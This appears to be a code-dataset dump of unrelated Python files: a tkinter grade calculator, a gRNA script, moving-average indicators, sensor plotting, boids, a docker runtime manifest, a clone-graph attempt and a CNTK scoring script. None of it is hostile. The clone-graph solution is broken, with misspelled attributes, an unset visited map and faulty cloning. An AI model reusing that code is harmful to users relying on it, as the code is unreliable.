else:\r\n newAvg = 0\r\n\r\n self.something = newAvg\r\n\r\n essayAvg = Label(self, text=self.something)\r\n Label(self, text=\"Essay Average\").grid(row=self.essayNumber + 23, column=8)\r\n essayAvg.grid(row=self.essayNumber + 23, column=9)\r\n\r\n self.essayNumber += 1\r\n\r\n\r\n\r\n\r\n # *** All calculate functions are the exact same, just with different names for different sections ***\r\n def calculateExams(self): # A function used by the Calculate function to calculate the exam average. Updates without adding a new exam\r\n\r\n if len(self.examList) != 0: # If the exam list has an exam in it, the previous grade is recorded. This is necessary because it hasn't been stored yet\r\n previousGrade = float(self.examGrade.get())\r\n self.examList[self.examNumber - 2] = previousGrade # The previous exam score is added to the end of the list, replaces the default 0\r\n else:\r\n self.examList.append(float(self.examGrade.get())) # If there is nothing else in the exam list, the grade is added\r\n\r\n sum = 0\r\n for i in range(len(self.examList)): # A for list that calculates the exam sum\r\n sum += self.examList[i]\r\n if len(self.examList) != 0:\r\n if len(self.examList) == 1: # If there is only 1 exam, that is the sum\r\n newAvg = self.examList[0]\r\n else:\r\n newAvg = sum / (len(self.examList)) # If there is more than 1 exam, the sum is divided by that number\r\n else:\r\n newAvg = 0 # If there are no exams, the exam average is 0\r\n\r\n self.something = newAvg # A variable needed to store the updating exam average\r\n examAvg = Label(self, text=self.something) # Updates the exam average label\r\n examAvg.grid(row=self.examNumber + 3, column=1)\r\n Label(self, text=\"Exam Average\").grid(row=self.examNumber + 3, column=0)\r\n return newAvg # The new average is returned so it can be used by other functions\r\n\r\n\r\n def calculateAssignments(self):\r\n\r\n if len(self.assignmentList) != 0:\r\n previousGrade = float(self.assignmentGrade.get())\r\n self.assignmentList[self.assignmentNumber - 2] = previousGrade\r\n else:\r\n self.assignmentList.append(float(self.assignmentGrade.get()))\r\n\r\n sum = 0\r\n for i in range(len(self.assignmentList)):\r\n sum += self.assignmentList[i]\r\n if len(self.assignmentList) != 0:\r\n if len(self.assignmentList) == 1:\r\n newAvg = self.assignmentList[0]\r\n else:\r\n newAvg = sum / (len(self.assignmentList))\r\n else:\r\n newAvg = 0\r\n\r\n self.something = newAvg\r\n assignmentAvg = Label(self, text=self.something)\r\n Label(self, text=\"Assignment Average\").grid(row=self.assignmentNumber + 3, column=4)\r\n assignmentAvg.grid(row=self.assignmentNumber + 3, column=5)\r\n\r\n return newAvg\r\n\r\n\r\n def calculateLabs(self):\r\n\r\n if len(self.labList) != 0:\r\n previousGrade = float(self.labGrade.get())\r\n self.labList[self.labNumber - 2] = previousGrade\r\n else:\r\n self.labList.append(float(self.labGrade.get()))\r\n\r\n sum = 0\r\n for i in range(len(self.labList)):\r\n sum += self.labList[i]\r\n if len(self.labList) != 0:\r\n if len(self.labList) == 1:\r\n newAvg = self.labList[0]\r\n else:\r\n newAvg = sum / (len(self.labList))\r\n else:\r\n newAvg = 0\r\n\r\n self.something = newAvg\r\n labAvg = Label(self, text=self.something)\r\n labAvg.grid(row=self.labNumber + 3, column=9)\r\n Label(self, text=\"Lab Average\").grid(row=self.labNumber + 3, column=8)\r\n return newAvg\r\n\r\n\r\n def calculateEssays(self):\r\n\r\n if len(self.essayList) != 0:\r\n previousGrade = float(self.essayGrade.get())\r\n self.essayList[self.essayNumber - 2] = previousGrade\r\n else:\r\n self.essayList.append(float(self.essayGrade.get()))\r\n\r\n sum = 0\r\n for i in range(len(self.essayList)):\r\n sum += self.essayList[i]\r\n if len(self.essayList) != 0:\r\n if len(self.essayList) == 1:\r\n newAvg = self.essayList[0]\r\n else:\r\n newAvg = sum / (len(self.essayList))\r\n else:\r\n newAvg = 0\r\n\r\n self.something = newAvg\r\n essayAvg = Label(self, text=self.something)\r\n essayAvg.grid(row=self.essayNumber + 22, column=9)\r\n Label(self, text=\"Essay Average\").grid(row=self.essayNumber + 22, column=8)\r\n return newAvg\r\n\r\n\r\n def calculateQuizzes(self):\r\n\r\n if len(self.quizList) != 0:\r\n previousGrade = float(self.quizGrade.get())\r\n self.quizList[self.quizNumber - 2] = previousGrade\r\n else:\r\n self.quizList.append(float(self.quizGrade.get()))\r\n\r\n sum = 0\r\n for i in range(len(self.quizList)):\r\n sum += self.quizList[i]\r\n if len(self.quizList) != 0:\r\n if len(self.quizList) == 1:\r\n newAvg = self.quizList[0]\r\n else:\r\n newAvg = sum / (len(self.quizList))\r\n else:\r\n newAvg = 0\r\n\r\n self.something = newAvg\r\n quizAvg = Label(self, text=self.something)\r\n quizAvg.grid(row=self.quizNumber + 22, column=1)\r\n Label(self, text=\"Quiz Average\").grid(row=self.quizNumber + 22, column=0)\r\n return newAvg\r\n\r\n\r\n def calculateFinalExam(self):\r\n\r\n if len(self.finalExamList) != 0:\r\n previousGrade = float(self.finalExamGrade.get())\r\n self.finalExamList[self.finalExamNumber - 2] = previousGrade\r\n else:\r\n self.finalExamList.append(float(self.finalExamGrade.get()))\r\n\r\n sum = 0\r\n for i in range(len(self.finalExamList)):\r\n sum += self.finalExamList[i]\r\n if len(self.finalExamList) != 0:\r\n if len(self.finalExamList) == 1:\r\n newAvg = self.finalExamList[0]\r\n else:\r\n newAvg = sum / (len(self.finalExamList))\r\n else:\r\n newAvg = 0\r\n\r\n self.something = newAvg\r\n finalExamAvg = Label(self, text=self.something)\r\n Label(self, text=\"Final Exam Average\").grid(row=self.finalExamNumber + 22, column=4)\r\n finalExamAvg.grid(row=self.finalExamNumber + 22, column=5)\r\n\r\n return newAvg\r\n\r\n\r\n def Calculate(self): # A function that calls of the calculate functions and finds the final grade of the class\r\n examAverage = 0\r\n try:\r\n examAverage = self.calculateExams() # If there are no exams, an attribute error will appear. Same for the rest of the sections\r\n except AttributeError: # If this happens, the exam average is recorded as 0\r\n nothing = 0\r\n\r\n assignmentAverage = 0\r\n try:\r\n assignmentAverage = self.calculateAssignments()\r\n except AttributeError:\r\n nothing = 0\r\n\r\n labAverage = 0\r\n try:\r\n labAverage = self.calculateLabs()\r\n except AttributeError:\r\n nothing = 0\r\n\r\n quizAverage = 0\r\n try:\r\n quizAverage = self.calculateQuizzes()\r\n except AttributeError:\r\n nothing = 0\r\n\r\n finalExamAverage = 0\r\n try:\r\n finalExamAverage = self.calculateFinalExam()\r\n except AttributeError:\r\n nothing = 0\r\n\r\n essayAverage = 0\r\n try:\r\n essayAverage = self.calculateEssays()\r\n except AttributeError:\r\n nothing = 0\r\n\r\n officialGrade = (examAverage * ((int(self.examWeight.get()))) + assignmentAverage * (\r\n (int(self.assignmentWeight.get())))\r\n + labAverage * ((int(self.labWeight.get()))) + quizAverage * ((int(self.quizWeight.get()))) +\r\n finalExamAverage * ((int(self.finalExamWeight.get()))) + essayAverage * (\r\n (int(self.essayWeight.get())))) / 100 # The final grade is calculated using the section weights and averages\r\n\r\n officialGradeLabel = Label(self, text=officialGrade, font=self.finalFont) # A label that shows the final percent\r\n officialGradeLabel.grid(row=21, column=15, rowspan = 2)\r\n\r\n gradeLetter = Label(self, text=self.getGrade(officialGrade, self.gradeScale), font=self.finalLetterFont) # A label that shows the final letter grade\r\n gradeLetter.grid(row=23, column=15, rowspan = 4) # Get this to update just like scores\r\n\r\n\r\n\r\ndef main(): # Main function\r\n\r\n root = Tk() # Creates an instance of the tkinter object\r\n\r\n app = GradeCalc(root) # Creates an instance of the grade calculator class, inheriting the tkinter object as a paramter\r\n app.title(\"Grade Calculator\") # Names the window\r\n root.withdraw() # Needed to ignore the original root window\r\n\r\n app.state('zoomed') # Maximizes the grade calculator window\r\n root.mainloop() # Runs the loop\r\n\r\n\r\n\r\nif __name__ == '__main__': # A call to the main function\r\n main()","sub_path":"GradeCalculator/GradeCalculatorGUI.py","file_name":"GradeCalculatorGUI.py","file_ext":"py","file_size_in_byte":28798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"101529061","text":"def spliting(grna,seq):\r\n\tstart=seq.find(grna)\r\n\tstop=start+20\r\n\tlefseq=seq[:start-1]\r\n\trightseq=seq[stop+1:]\r\n\tdouble_lst=[lefseq,rightseq]\r\n\treturn double_lst\r\ndef replacing(lst):\r\n\tnew_lst=[seq.replace(\"GAGACG\",\"GAGAtG\") for seq in lst]\r\n\tnew_new_seq=[sequence.replace(\"CGTCTC\",\"CaTCTC\") for sequence in new_lst]\r\n\treturn new_new_seq\r\ndef tiankong(grna,lst):\r\n\tnewseq=lst[0]+grna+lst[1]\r\n\treturn newseq\r\nfasta={}\r\nfasta2={}\r\nwith open(\"C:/Users/Administrator/Desktop/output5-3-filter.txt\") as f:\r\n\tfor line in f:\r\n\t\ttag,tag2,tag3,grna,chr,pos,*seq=line.split(\"\\t\")\r\n\t\tnew_seq=[sequence.strip(\"\\n\").strip(\"\\t\").upper() for sequence in seq]\r\n\t\tnew_new_seq=[spliting(grna,haha) for haha in new_seq]\r\n\t\tfasta[tag]=new_new_seq\r\nfor key,val in fasta.items():\r\n\tfina_lst=[replacing(lst) for lst in val]\r\n\tfasta2[key]=fina_lst\r\nwith open(\"C:/Users/Administrator/Desktop/output5-3-filter.txt\") as k:\r\n\tfor line in k:\r\n\t\ttag,tag2,tag3,grna,chr,pos,*seq=line.split(\"\\t\")\r\n\t\tnew3_lst=[tiankong(grna,long) for long in fasta2[tag]]\r\n\t\twith open(\"C:/Users/Administrator/Desktop/final.txt\",'a') as h:\r\n\t\t\th.write(tag+\"\\t\"+tag2+\"\\t\"+tag3+\"\\t\"+grna+\"\\t\"+chr+\"\\t\"+pos+\"\\t\"+\"\\t\".join(new3_lst)+\"\\n\")\r\n\r\n","sub_path":"task7.py","file_name":"task7.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"177918795","text":"from __future__ import absolute_import\nimport numpy as np\nfrom pyti import catch_errors\nfrom pyti.function_helper import fill_for_noncomputable_vals\nfrom six.moves import range\n\n# import pandas as pd\n\n\n# legacy Pandas (too slow for backtesting)\n# def pandas_smoothed_moving_average(data, period):\n# \"\"\"\n# Smoothed Moving Average.\n#\n# Formula:\n# smma = avg(data(n)) - avg(data(n)/n) + data(t)/n\n# \"\"\"\n# catch_errors.check_for_period_error(data, period)\n# series = pd.Series(data)\n# return series.ewm(alpha = 1.0/period).mean().values.flatten()\n\n\n# faster alternative implementations\n###########################################\ndef smoothed_moving_average(data, window):\n data = np.array(data)\n alpha = 2 / (window + 1.0)\n alpha_rev = 1-alpha\n n = data.shape[0]\n\n pows = alpha_rev**(np.arange(n+1))\n\n scale_arr = 1/pows[:-1]\n offset = data[0]*pows[1:]\n pw0 = alpha*alpha_rev**(n-1)\n\n mult = data*pw0*scale_arr\n cumsums = mult.cumsum()\n out = offset + cumsums*scale_arr[::-1]\n return out\n\n\ndef alt2_smoothed_moving_average(data, period):\n \"\"\"\n Returns the exponentially weighted moving average of x.\n\n Parameters:\n -----------\n data : array-like\n period : float {0 <= period <= 1}\n\n Returns:\n --------\n ewma : numpy array\n the exponentially weighted moving average\n \"\"\"\n # coerce x to an array\n data = np.array(data)\n n = data.size\n # create an initial weight matrix of (1-alpha), and a matrix of powers\n # to raise the weights by\n w0 = np.ones(shape=(n, n)) * (1 - period)\n p = np.vstack([np.arange(i, i - n, -1) for i in range(n)])\n # create the weight matrix\n w = np.tril(w0 ** p, 0)\n # calculate the ewma\n return np.dot(w, data[::np.newaxis]) / w.sum(axis=1)\n\n\ndef alt3_smoothed_moving_average(data, window):\n data = np.array(data)\n alpha = 2 / (window + 1.0)\n scale = 1/(1-alpha)\n n = data.shape[0]\n scale_arr = (1-alpha)**(-1*np.arange(n))\n weights = (1-alpha)**np.arange(n)\n pw0 = (1-alpha)**(n-1)\n mult = data*pw0*scale_arr\n cumsums = mult.cumsum()\n out = cumsums*scale_arr[::-1] / weights.cumsum()\n\n return out\n","sub_path":"pyti/smoothed_moving_average.py","file_name":"smoothed_moving_average.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"137030674","text":"import netCDF4 as nc\nimport numpy as np\nfrom datetime import datetime, timedelta\nimport sqlite3\nfrom pathlib import Path\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nfrom matplotlib.ticker import MaxNLocator # for axis integer\nimport pandas as pd\nimport configparser\nimport time\nimport tower_lib as tl\n\nstart_time = time.time()\n\nCONFIG_NAME = \"../tower.conf\"\nDEBUG = False\n\n\ndef read_config(path):\n\n config = configparser.ConfigParser(\n interpolation=configparser.ExtendedInterpolation()\n )\n config.read(path)\n\n # settings = dict(config.items(\"paths\"))\n settings = dict(config[\"paths\"])\n # # Flatten the structure and convert the types of the parameters\n # settings = dict(\n # wwwpath=config.get(\"paths\", \"wwwpath\"),\n # datapath=config.get(\"paths\", \"datapath\"),\n # dbpath=config.get(\"paths\", \"dbpath\"),\n # dbfile=config.getint(\"paths\", \"dbfile\"),\n # npzpath=config.getfloat(\"paths\", \"npzpath\"),\n # L1path=config.getint(\"paths\", \"l1path\"),\n # L2path=config.get(\"paths\", \"l2path\"),\n # rrdpath=config.get(\"paths\", \"rrdpath\"),\n # )\n\n return settings\n\n\ndef smooth(x, window_len=11, window='hanning'):\n \"\"\"\n \"\"\"\n\n if x.ndim != 1:\n raise ValueError(\"smooth only accepts 1 dimension arrays.\")\n if x.size < window_len:\n raise ValueError(\"Input vector needs to be bigger than window size.\")\n if window_len < 3:\n return x\n\n s = np.r_[2*x[0]-x[window_len-1::-1], x, 2*x[-1]-x[-1:-window_len:-1]]\n\n if window == 'flat': # moving average\n w = np.ones(window_len)\n elif window == 'hanning':\n w = np.hanning(window_len)\n elif window == 'hamming':\n w = np.hamming(window_len)\n elif window == 'bartlett':\n w = np.bartlett(window_len)\n elif window == 'blackman':\n w = np.blackman(window_len)\n else:\n raise ValueError(\"Window is on of 'flat', 'hanning', 'hamming', 'bartlett', 'blackman'\")\n\n y = np.convolve(w/w.sum(), s, mode='same')\n\n return y[window_len:-window_len+1]\n\n\ndef quality_info(datetimes, window_len, frequency):\n \"\"\" Computes gaps in data in every window_len (seconds) step\n with window_len step (not running value)\n \"\"\"\n normal_amount = window_len*frequency\n mask = np.full_like(datetimes, True)\n\n series = pd.Series(mask, index=datetimes)\n\n quality = (1 - series.resample(timedelta(seconds=window_len), label=\"left\").sum()/normal_amount)*100.\n\n return quality.index[1:-1], quality.values[1:-1]\n\n\nwindow=30 # rolling and resampling window (min)\n\n# First read sonfiguration\nconfig = read_config(CONFIG_NAME)\n\ndbfile = \"%s/%s\" % (config['dbpath'], config['dbfile'])\nconn = sqlite3.connect(dbfile)\ncur = conn.cursor()\ncur.execute('SELECT short_name FROM towers')\ntrows = cur.fetchall()\nfor trow in trows:\n tower_name = trow[0]\n print(\"Working on tower named: %s\" % (tower_name))\n\n plt, ax0, ax1 = tl.plot.web_accustic_stat_prep()\n cur.execute('SELECT equipment_name,Hz,height FROM equipment WHERE tower_name=? AND type=\"sonic\" AND show=1', (tower_name,))\n erows = cur.fetchall()\n for erow in erows:\n equipment_name = erow[0]\n frequency = float(erow[1])\n hgt = float(erow[2])\n print(\" Working on tower %s, equipment %s:\" % (tower_name, equipment_name))\n\n buffer_file = Path(config['buffer_path'],'%s_%s_BUFFER.npz' % (tower_name, equipment_name))\n\n try:\n data = tl.reader.buffer(buffer_file)\n except:\n data = tl.data.create_empty_pd()\n\n data = tl.data.clean(data)\n data = tl.math.primes(data,int(window*frequency*60), detrend='mean')\n data = tl.math.tke(data)\n plt, ax0, ax1 = tl.plot.web_accustic_stat(data, frequency=frequency, window=window*frequency*60, \n plt=plt, ax0=ax0, ax1=ax1, label=f\"{equipment_name} ({hgt} m)\")\n ax0.legend()\n ax1.legend()\n figname_data = \"%s/static/%s_STAT_data24hr_spec.png\" % (config['wwwpath'], tower_name)\n plt.savefig(figname_data, dpi=150)\n\n \nprint(\"{}: Running {:.2f} seconds, {:.2f} minutes \".format( datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"),\n (time.time() - start_time),\n (time.time() - start_time)/60. ) )\n\n","sub_path":"scripts/plot_rtstat.py","file_name":"plot_rtstat.py","file_ext":"py","file_size_in_byte":4238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"376604211","text":"\"\"\"\nA deliberately bad implementation of [Boids](http://dl.acm.org/citation.cfm?doid=37401.37406)\nfor use as an exercise on refactoring.\n\"\"\"\n\nfrom matplotlib import pyplot as plt\nfrom matplotlib import animation\n\nimport numpy\n\nfrom parameters import*\nimport boids\n\nflock=boids.boids(attraction_strength,boidproximitythreshold,matchspeed_distance,matchspeed_strength,number_of_boids)\nflock.initial_flock()\n\n\n\t\t\t\n\n\t\nfigure=plt.figure()\naxes=plt.axes(xlim=(-500,1500), ylim=(-500,1500))\n\nscatter=axes.scatter([boid.xposition for boid in flock.boids],[boid.yposition for boid in flock.boids])\n\ndef animate(frame):\n flock.update_boids()\n scatter.set_offsets(zip([boid.xposition for boid in flock.boids],[boid.yposition for boid in flock.boids]))\n\n\nanim = animation.FuncAnimation(figure, animate,\n frames=200, interval=50)\n\nif __name__ == \"__main__\":\n plt.show()\n\n\n","sub_path":"Animate.py","file_name":"Animate.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"93482030","text":"\"\"\"manifest module for linux runtime\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport logging\nimport pwd\n\nfrom treadmill import dist\nfrom treadmill import subproc\n\nfrom treadmill.appcfg import manifest as app_manifest\n\n_LOGGER = logging.getLogger(__name__)\n\n\ndef add_runtime(tm_env, manifest):\n \"\"\"Adds linux runtime specific details to the manifest.\n And add docker runtime specific details to the manifest\n \"\"\"\n _transform_services(manifest)\n\n app_manifest.add_linux_system_services(tm_env, manifest)\n app_manifest.add_linux_services(manifest)\n _add_dockerd_services(manifest, tm_env)\n\n\ndef _generate_command(raw_cmd, unique_id):\n \"\"\"Get treadmill docker running command from image\n \"\"\"\n if raw_cmd.startswith('docker://'):\n image_cmd = raw_cmd[9:].split(None, 1)\n if len(image_cmd) > 1:\n image = image_cmd[0]\n cmd = image_cmd[1]\n else:\n image = image_cmd[0]\n cmd = None\n return _get_docker_run_cmd(unique_id, image, cmd)\n else:\n return raw_cmd\n\n\ndef _get_docker_run_cmd(unique_id, image, command=None, uidgid=None):\n \"\"\"Get docker run cmd from raw command\n \"\"\"\n # TODO: hardode volume for now\n volumes = [\n ('/var/tmp', '/var/tmp', 'rw'),\n ('/var/spool', '/var/spool', 'rw'),\n ]\n\n tpl = (\n 'exec {tm} sproc docker'\n ' --unique_id {unique_id}'\n ' --envdirs /env,/services/{unique_id}/env'\n ' --image {image}'\n )\n\n for volume in volumes:\n tpl += ' --volume {source}:{dest}:{mode}'.format(\n source=volume[0],\n dest=volume[1],\n mode=volume[2]\n )\n\n if uidgid is not None:\n tpl += ' --user {uidgid}'.format(uidgid=uidgid)\n\n if command is not None:\n tpl += ' -- {cmd}'\n\n return tpl.format(\n tm=dist.TREADMILL_BIN,\n unique_id=unique_id,\n image=image,\n cmd=command,\n )\n\n\ndef _transform_services(manifest):\n \"\"\"Adds linux runtime specific details to the manifest.\"\"\"\n # Normalize restart count\n manifest['services'] = [\n {\n 'name': service['name'],\n 'command': _generate_command(\n service['command'],\n service['name'],\n ),\n 'restart': {\n 'limit': int(service['restart']['limit']),\n 'interval': int(service['restart']['interval']),\n },\n 'root': service.get('root', False),\n 'proid': (\n 'root' if service.get('root', False)\n else manifest['proid']\n ),\n 'environ': manifest['environ'],\n 'config': None,\n 'downed': False,\n 'trace': True,\n }\n for service in manifest.get('services', [])\n ]\n\n\ndef _get_docker_registry(_tm_env):\n # TODO get registry from cell_config.yml\n return 'lab-repo.msdev.ms.com:5000'\n\n\ndef _add_dockerd_services(manifest, tm_env):\n \"\"\"Configure docker daemon services.\"\"\"\n # add dockerd service\n (_uid, proid_gid) = _get_user_uid_gid(manifest['proid'])\n dockerd_svc = {\n 'name': 'dockerd',\n 'proid': 'root',\n 'restart': {\n 'limit': 5,\n 'interval': 60,\n },\n 'command': (\n 'exec {dockerd} --add-runtime docker-runc={docker_runtime}'\n ' --default-runtime=docker-runc'\n ' --exec-opt native.cgroupdriver=cgroupfs --bridge=none'\n ' --ip-forward=false --ip-masq=false --iptables=false'\n ' --cgroup-parent=/docker -G {gid}'\n ' --insecure-registry {registry} --add-registry {registry}'\n ).format(\n dockerd=subproc.resolve('dockerd'),\n docker_runtime=subproc.resolve('docker_runtime'),\n gid=proid_gid,\n registry=_get_docker_registry(tm_env)\n ),\n 'root': True,\n 'environ': [],\n 'config': None,\n 'downed': False,\n 'trace': False,\n }\n manifest['services'].append(dockerd_svc)\n\n\ndef _get_user_uid_gid(username):\n user_pw = pwd.getpwnam(username)\n return (user_pw.pw_uid, user_pw.pw_gid)\n","sub_path":"lib/python/treadmill/runtime/docker2/_manifest.py","file_name":"_manifest.py","file_ext":"py","file_size_in_byte":4276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"234003518","text":"class UndirectedGraphNode:\n def __init__(self, x):\n self.label = x\n self.neighbors = []\n\nclass Solution:\n # @param node, a undirected graph node\n # @return a undirected graph node\n def clone(self,node):\n self.visited[node.lable]=1\n newNode=UndirectedGraphNode(node.lable)\n for neighbor in node.neighbors:\n if not self.visited.has_key(neighbor.lable) or not self.visited[neighbor.lable]:\n remain=self.clone(neighbor)\n newNode.append(remain)\n self.visited[node.lable]=0\n \n def cloneGraph(self, node):\n if not node:\n return node\n visited={}\n queue=[]\n visted={}\n queue.append(node)\n root=UndirectedGraphNode(node.lable)\n while queue:\n cur=queue.pop()\n self.visited[cur.label]=1\n for neighbor in cur.neighbors:\n if not visited.has_key(neighbor.label) or not visited[neighbor.label]:\n copy=UndirectedGraphNode(neighbor.label)\n cur.neighbors.append(copy)\n copy.neighbors.append(cur)\n queue.insert(0,copy)\n return root\n","sub_path":"LeetCode/rewrite/cloneGraph.py","file_name":"cloneGraph.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"60319021","text":"# -*- coding: utf-8 -*-\nimport sys\nimport os\nimport importlib\nimport random\nimport json\nimport cv2\nimport numpy as np\nfrom helpers_cntk import *\nfrom PARAMETERSall import modelDir_1, modelDir_2, cntk_nrRois_1, cntk_nrRois_2, getCntkInputs, applyNonMaximaSuppression, nmsThreshold, get_grid_rois_inbox, train_posOverlapThres, nrClasses_1, scoreRois, classes_1, vis_decisionThresholds, nrClasses_2, classes_2\nfrom SLIDINGWINDOWPARAMS import generate_rois, get_grid_rois, imH, imW, stepsize, rectangles, ratios, stepsize_ratio, small_rectangles\nfrom helpers import imread\nimport logging\n\nlogging.basicConfig(\n format='%(asctime)s %(levelname)s - %(message)s', level=logging.DEBUG)\n\nfrom PIL import Image, ImageChops, ImageOps\n\n\ndef makeThumb(f_in, size=(80, 80)):\n image = Image.open(f_in)\n offset_x = max(image.size[0] - image.size[1], 0)\n offset_y = max(image.size[1] - image.size[0], 0)\n crop = image.crop((int(offset_x / 2), int(offset_y / 2),\n image.size[0] - int(offset_x / 2), image.size[1] - int(offset_y / 2)))\n print((int(offset_x / 2), int(offset_y / 2),\n size[0] - int(offset_x / 2), size[1] - int(offset_y / 2)), offset_x, offset_y)\n crop_size = crop.size\n crop = crop.resize(size, Image.ANTIALIAS)\n crop.save('test.jpg')\n print(offset_x, offset_y, crop.size, image.size)\n return crop, offset_x, offset_y, image.size, crop_size\n\n\ndef score_one_image(imgPath, mode_1, model_2):\n # choose which classifier to use\n\n # no need to change these parameters\n boAddSelectiveSearchROIs = True\n boAddGridROIs = True\n boFilterROIs = True\n boUseNonMaximaSurpression = True\n\n print(\"reading image...\")\n pil_image, offset_x, offset_y, original_size, crop_size = makeThumb(\n imgPath, (imH, imW))\n print(original_size, crop_size, offset_x, offset_y)\n img = cv2.cvtColor(np.array(pil_image), cv2.COLOR_RGB2BGR)\n cv2.imwrite('test2.jpg', img)\n # compute ROIs\n gridRois_1 = get_grid_rois(imW, imH, stepsize / 2, rectangles)\n if len(gridRois_1) >= cntk_nrRois_1:\n gridRois_1 = gridRois_1[:cntk_nrRois_1]\n else:\n gridRois_1 = gridRois_1 + [[0, 0, 1, 1]] * \\\n (cntk_nrRois_1 - len(gridRois_1))\n\n print(\"prepare DNN inputs...\")\n # prepare DNN inputs\n _, _, roisCntk_1 = getCntkInputs(\n 'test2.jpg', gridRois_1, None, train_posOverlapThres, nrClasses_1, cntk_nrRois_1, imW, imH)\n arguments_1 = {\n # convert to CNTK's HWC format\n model_1.arguments[0]: [np.ascontiguousarray(np.array(img, dtype=np.float32).transpose(2, 0, 1))],\n model_1.arguments[1]: [np.array(roisCntk_1, np.float32)]\n }\n\n print(\"run DNN model...\")\n # run DNN model\n dnnOutputs_1 = model_1.eval(arguments_1)[0][0]\n dnnOutputs_1 = dnnOutputs_1[:len(gridRois_1)]\n\n print(\"score all ROIs...\")\n # score all ROIs\n labels_1, scores_1 = scoreRois(classifier, dnnOutputs_1, 1, 1, 1, len(classes_1),\n decisionThreshold=vis_decisionThresholds[classifier])\n\n print(\"perform non-maxima surpression...\")\n # perform non-maxima surpression\n nmsKeepIndices_1 = []\n if boUseNonMaximaSurpression:\n nmsKeepIndices_1 = applyNonMaximaSuppression(\n nmsThreshold, labels_1, scores_1, gridRois_1)\n\n # NMS transfer\n transfer_index = [x for x in nmsKeepIndices_1 if labels_1[x] > 0]\n transfer_boxes = [gridRois_1[x] for x in transfer_index]\n\n # compute ROIs\n if len(transfer_boxes) > 0:\n gridRois_2 = get_grid_rois_inbox(\n transfer_boxes, ratios, stepsize_ratio / 2, imW, imH)\n else:\n gridRois_2 = get_grid_rois(imW, imH, stepsize / 2, small_rectangles)\n if len(gridRois_2) >= cntk_nrRois_2:\n gridRois_2 = gridRois_2[:cntk_nrRois_2]\n else:\n gridRois_2 = gridRois_2 + [[0, 0, 1, 1]] * \\\n (cntk_nrRois_2 - len(gridRois_2))\n\n print(\"prepare DNN inputs...\")\n # prepare DNN inputs\n _, _, roisCntk_2 = getCntkInputs(\n 'test2.jpg', gridRois_2, None, train_posOverlapThres, nrClasses_2, cntk_nrRois_2, imW, imH)\n arguments_2 = {\n # convert to CNTK's HWC format\n model_2.arguments[0]: [np.ascontiguousarray(np.array(img, dtype=np.float32).transpose(2, 0, 1))],\n model_2.arguments[1]: [np.array(roisCntk_2, np.float32)]\n }\n\n print(\"run DNN model...\")\n # run DNN model\n dnnOutputs_2 = model_2.eval(arguments_2)[0][0]\n dnnOutputs_2 = dnnOutputs_2[:len(gridRois_2)]\n\n print(\"score all ROIs...\")\n # score all ROIs\n labels_2, scores_2 = scoreRois(classifier, dnnOutputs_2, 1, 1, 1, len(classes_2),\n decisionThreshold=vis_decisionThresholds[classifier])\n\n print(\"perform non-maxima surpression...\")\n # perform non-maxima surpression\n nmsKeepIndices_2 = []\n if boUseNonMaximaSurpression:\n nmsKeepIndices_2 = applyNonMaximaSuppression(\n nmsThreshold, labels_2, scores_2, gridRois_2)\n\n outDict = []\n for l, s, r in zip(labels_2, scores_2, gridRois_2):\n # create json-encoded string of all detections\n if l == 1:\n a = 1\n x_min = (r[0] * float(crop_size[0]) / float(imW) +\n offset_x / 2) / original_size[0]\n x_max = (r[2] * float(crop_size[0]) / float(imW) +\n offset_x / 2) / original_size[0]\n y_min = (r[1] * float(crop_size[1]) / float(imH) +\n offset_y / 2) / original_size[1]\n y_max = (r[3] * float(crop_size[1]) / float(imH) +\n offset_y / 2) / original_size[1]\n outDict.append({\"ItemName\": str(l), \"Score\": np.asscalar(s), \"nms\": False,\n \"Xmin\": x_min, \"Ymin\": y_min, \"Xmax\": x_max, \"Ymax\": y_max})\n for i in nmsKeepIndices_2:\n outDict[i][\"nms\"] = True\n\n output = []\n for obj in outDict:\n if obj['ItemName'] == '0' or obj['nms'] == False:\n continue\n output.append(obj)\n return output\n\n\n####################################\n# Main\n####################################\n\nif __name__ == '__main__':\n ####################################\n # Parameters\n ####################################\n classifier = 'nn'\n model_path_1 = os.path.join(modelDir_1, \"frcn_\" + classifier + \".model\")\n model_path_2 = os.path.join(modelDir_2, \"frcn_\" + classifier + \".model\")\n logging.debug(\"{} {}\".format(model_path_1, model_path_2))\n input_folder = os.environ['INPUT_FOLDER']\n output_folder = os.environ['OUTPUT_FOLDER']\n if 'AZ_BATCH_TASK_WORKING_DIR' in os.environ:\n input_folder = input_folder.replace('$AZ_BATCH_TASK_WORKING_DIR', os.environ[\n 'AZ_BATCH_TASK_WORKING_DIR'])\n output_folder = output_folder.replace('$AZ_BATCH_TASK_WORKING_DIR', os.environ[\n 'AZ_BATCH_TASK_WORKING_DIR'])\n# load cntk model\n print(\"Loading DNN...\")\n model_1 = load_model(model_path_1)\n model_2 = load_model(model_path_2)\n\n # score all images in one folder\n print(\"scoring...\")\n imgs = os.listdir(input_folder)\n for im in imgs:\n print(im)\n im_path = os.path.join(input_folder, im)\n if os.path.isdir(im_path):\n continue\n result = score_one_image(im_path, model_1, model_2)\n out = os.path.join(output_folder, os.path.basename(\n im_path) + '.fscnn.json')\n logging.debug('Writing to {}'.format(out))\n with open(out, 'w') as f:\n json.dump(result, f)\n","sub_path":"6_scoreImage_together.py","file_name":"6_scoreImage_together.py","file_ext":"py","file_size_in_byte":7485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"403836640","text":"import click\n\nfrom bluecanary.managers import AlarmsManager, 